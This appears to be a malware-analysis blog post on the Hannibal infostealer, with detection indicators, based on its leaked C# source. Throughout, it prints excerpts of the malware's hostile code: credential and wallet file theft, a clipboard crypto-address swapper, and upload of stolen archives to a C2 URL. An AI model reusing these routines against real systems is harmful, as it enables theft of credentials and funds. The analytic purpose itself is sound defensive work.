Hannibal Stealer: A Deep Technical Analysis

In the previous post, we explored how Hannibal Stealer bypasses modern browser protections to access and steal cookies. Now, it’s time to take a broader look at this malware — examining its overall design, evolution, attack methods, and real-world implications. Below is our in-depth analysis, based directly on the leaked source code we reviewed.

Stealer Lineage: From Sharp & TX to Hannibal

Hannibal Stealer’s source code has clear signs that it was developed directly from two earlier .NET-based infostealers called Sharp Stealer and TX Stealer. The malware’s internal namespace is still labeled as SHARP, and we also encountered the ASCII banner:

// Excerpt from SystemInfo.cs
Console.WriteLine(@"<--- CoderSharp --->");

Apparently, the core functions – such as cookie theft modules, credential harvesting, and system profiling – remain mostly unchanged from the original Sharp/TX Stealers. The main alteration we identified was in its data exfiltration mechanism: Hannibal switched from Telegram-based exfiltration (used in earlier variants) to utilizing either an attacker-controlled HTTP server or Telegram bots, selectable via a configuration setting.

The comparison table below highlights significant changes that enhance the modern version’s practicality and operational effectiveness compared to its predecessors.

Where Sharp Stealer felt more like a proof-of-concept or a skiddie tool, Hannibal is closer to a deployable operation kit. It’s more modular, better organized, and can be tailored by skilled operators.

The main areas of improvement we found include:

• App-Bound Encryption (V20) bypass: Includes DLL injection or COM interface usage to extract Chrome cookies even with enhanced encryption.

• Exfiltration Methods: Operators choose between Telegram or C2 servers for data exfiltration.

• Data enrichment: Hannibal adds tags, counts, and folder structures to organize stolen data.

Recommended Reading

Hannibal Stealer vs. Browser Security

Attack Chain & Workflow

We reconstructed Hannibal’s complete attack chain by analyzing each section of the leaked source code.

Initial Compromise Vector

Hannibal does not have its own built-in infection mechanism. This means that attackers distributing Hannibal would rely on phishing campaigns or malicious downloads disguised as legitimate software. These loaders or droppers run Hannibal directly on the victim’s system.

Persistence and Privilege Checks

Hannibal either does not explicitly implement persistence itself. The malware primarily operates as a single-instance data-stealing session. However, persistence mechanisms could be deployed externally by the third-party loaders/droppers via scheduled tasks, registry entries, or startup folders.

We did find a marker-based mutex mechanism to ensure a single instance execution:

// Help.Start() function example
if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\CefSharp\lock"))
    Environment.Exit(0);
else
    File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\CefSharp\lock", "running");

System Profiling & Evasion

On execution, Hannibal gathers detailed victim information (hostname, IP, geolocation, antivirus software, clipboard contents, etc.) to profile the infected system.

var hostName = Environment.MachineName;
var userName = Environment.UserName;
var ip = new WebClient().DownloadString("https://api.ipify.org");

To evade detection, Hannibal masquerades as a legitimate Chromium subprocess (CefSharp.BrowsersSubprocess.exe), which helps it blend into the user’s environment. This feature was previously described in my earlier article.

High-Value Data Prioritization

One interesting finding was Hannibal’s built-in high-value target filtering. After extracting browser data, it scans credential dumps specifically for valuable domains like financial services or cryptocurrency exchanges:

string[] for_search = { "paypal.com", "binance.com", "coinbase.com" /*...*/ };

foreach (string domain in for_search)
{
    if (stolenData.Contains(domain))
        MarkHighValue(domain);
}

This prioritization technique helps attackers by focusing their attention immediately on the most valuable stolen credentials.

FTP Credential Theft

Hannibal Stealer’s codebase contains a few modules specifically designed to extract credentials and configuration files from commonly used FTP clients.

We found support for two popular FTP clients:

• FileZilla
• Total Commander.

FileZilla’s implementation includes searching the victim’s system for FileZilla’s recentservers.xml file, containing plaintext or base64-encoded FTP server credentials:

// Example: Extracting FileZilla FTP credentials
string fileZillaPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "FileZilla", "recentservers.xml");

if (File.Exists(fileZillaPath))
{
    File.Copy(fileZillaPath, stolenDataDir + "\\FileZilla_recentservers.xml");
    IncrementFTPCount();
}

The Total Commander FTP related code copies the wcx_ftp.ini file, which contains FTP server addresses, usernames, and encoded passwords.

// Extracting Total Commander FTP credentials
string tcFtpPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "GHISLER", "wcx_ftp.ini");

if (File.Exists(tcFtpPath))
{
    File.Copy(tcFtpPath, stolenDataDir + "\\TotalCommander_wcx_ftp.ini");
    IncrementFTPCount();
}

VPN Credential and Configuration Theft

Hannibal also aims to VPN applications. It locates configuration directories and files associated with popular VPN clients, including:

• NordVPN
• ExpressVPN
• CyberGhost OpenVPN
• ProtonVPN
• Private Internet Access

Here’s a snippet illustrating how Hannibal locates and steals CyberGhost VPN configuration data:

// CyberGhost VPN credentials theft
string cyberGhostPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "CyberGhost");

if (Directory.Exists(cyberGhostPath))
{
    CopyDirectory(cyberGhostPath, Path.Combine(stolenDataDir, "CyberGhost"));
    IncrementVPNCount();
}

Similarly, ExpressVPN configurations are targeted by copying the entire configuration directory:

// ExpressVPN credential extraction
string expressVPNPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "ExpressVPN");

if (Directory.Exists(expressVPNPath))
{
    CopyDirectory(expressVPNPath, Path.Combine(stolenDataDir, "ExpressVPN"));
    IncrementVPNCount();
}

The listed VPN services are primarily intended for personal use. We suggest that attackers could exploit them for their own purposes, such as incorporating them into their operations or reselling them for profit.

Cryptocurrency Wallet Theft

Hannibal Stealer’s source code contains a few modules for explicit support of some cryptocurrency wallets. These modules are intended for extracting wallet files, seed phrases, private keys, and related configuration data from popular wallet software.

Wallets Targeted by Hannibal Stealer:

• Bitcoin Core
• Electrum
• Litecoin Core
• Exodus
• Atomic Wallet
• Monero
• Ethereum (Mist, MyCrypto, MyEtherWallet)
• Dash Core
• Zcash
• Jaxx

One notable example is the extraction of the Bitcoin Core wallet file (wallet.dat), which contains users’ private keys. Hannibal retrieves the file location from the Windows Registry and then copies the wallet file directly into its loot directory:

// Bitcoin Core wallet theft
RegistryKey btcReg = Registry.CurrentUser.OpenSubKey(@"Software\Bitcoin\Bitcoin-Qt");
string btcWalletPath = btcReg?.GetValue("strDataDir")?.ToString();

if (!string.IsNullOrEmpty(btcWalletPath))
{
    string walletFile = Path.Combine(btcWalletPath, "wallet.dat");
    if (File.Exists(walletFile))
    {
        File.Copy(walletFile, stolenDataDir + "\\BitcoinCore_wallet.dat");
        IncrementWalletCount();
    }
}

Similarly, Hannibal directly targets Electrum wallets, extracting the wallet files which store seed phrases or encrypted private keys:

// Electrum wallet theft
string electrumWalletPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum", "wallets");

if (Directory.Exists(electrumWalletPath))
{
    CopyDirectory(electrumWalletPath, Path.Combine(stolenDataDir, "ElectrumWallets"));
    IncrementWalletCount();
}

Clipboard Hijacking for Cryptocurrency Transactions

Additionally, our analysis uncovered Hannibal’s built-in clipboard hijacking mechanism (crypto clipper). The malware monitors the victim’s clipboard, detects cryptocurrency addresses, and stealthily replaces them with attacker-controlled addresses. Thus, any victim inadvertently sending cryptocurrency transactions could unknowingly send funds directly to the attacker’s wallet:

// Clipboard Hijacking snippet
string clipboardText = Clipboard.GetText();

if (Regex.IsMatch(clipboardText, bitcoinRegexPattern))
{
    Clipboard.SetText(attackerBitcoinAddress);
}

Data Exfiltration Steps

Finally, Hannibal compresses stolen data into ZIP archives and sends it to a command-and-control server or Telegram bot, depending on its configuration. These archives are not password-protected. No compression or encryption beyond simple ZIP.

 ZipFile.CreateFromDirectory(stolenDataPath, zipFilePath);
using (var wc = new WebClient())
{
    wc.UploadFile(C2Url, zipFilePath);
}

Hannibal Stealer Collected Files

Recommended Reading

Proactive Threat Hunting: Techniques to Identify Malicious Infrastructure

Self-Security Features

In this final section, we analyze Hannibal Stealer’s design from a malware analysis perspective, evaluating standard features such as anti-AV tactics, self-encryption, and secure C2 communications.

Lack of Code Obfuscation or Polymorphism

The studied codebase was not obfuscated at all. Namespaces and method names are mostly intact, such as:

• SHARP.BRWSR
• GetCookies()
• WritePasswords()

Considering that the C# language is used for development, this makes it easier to reverse-engineer. I didn’t find any signs of polymorphism being used either.

Antivirus Evasion Techniques

Hannibal exhibits minimal stealth techniques:

• ❌ No process hollowing or reflective DLL injection
• ❌ No API unhooking
• ❌ No in-memory or fileless execution
• ✅ Browser data is accessed via direct filesystem reads (File.Copy, SQLiteHandler)
• ✅ Temporarily copies locked browser files to Temp before reading

YARA Rules and IOC Patterns

Due to its static and unprotected structure, Hannibal exposes many detectable indicators:

• Hardcoded strings like:
  • t.me/CoderSharp
  • SHARP
  • Targeted browser folder names (e.g., Google, Opera)
• Extracted file names:
  • FileZilla_recentservers.xml
  • TotalCommander_wcx_ftp.ini
  • wallet.dat from the wallet directories
• Function names:
  • GetEncryptionKey()
  • DecryptData()
  • GetPasswords()

These make it straightforward to write effective YARA rules.

Summary Table

Conclusion

From our analysis perspective, Hannibal Stealer is notable for its effectiveness in bypassing modern browser security measures like Chrome’s cookie encryption and multi-factor authentication protections. By capturing session cookies directly from memory, Hannibal facilitates instant account takeover without requiring credentials or bypassing traditional authentication measures.

On the other hand, we do not observe any strong anti-AV techniques, such as self-encryption or embedded rootkit features. This suggests one of two possibilities: either it can be easily stopped by modern AV solutions, or it is used in conjunction with other tools that implement these features.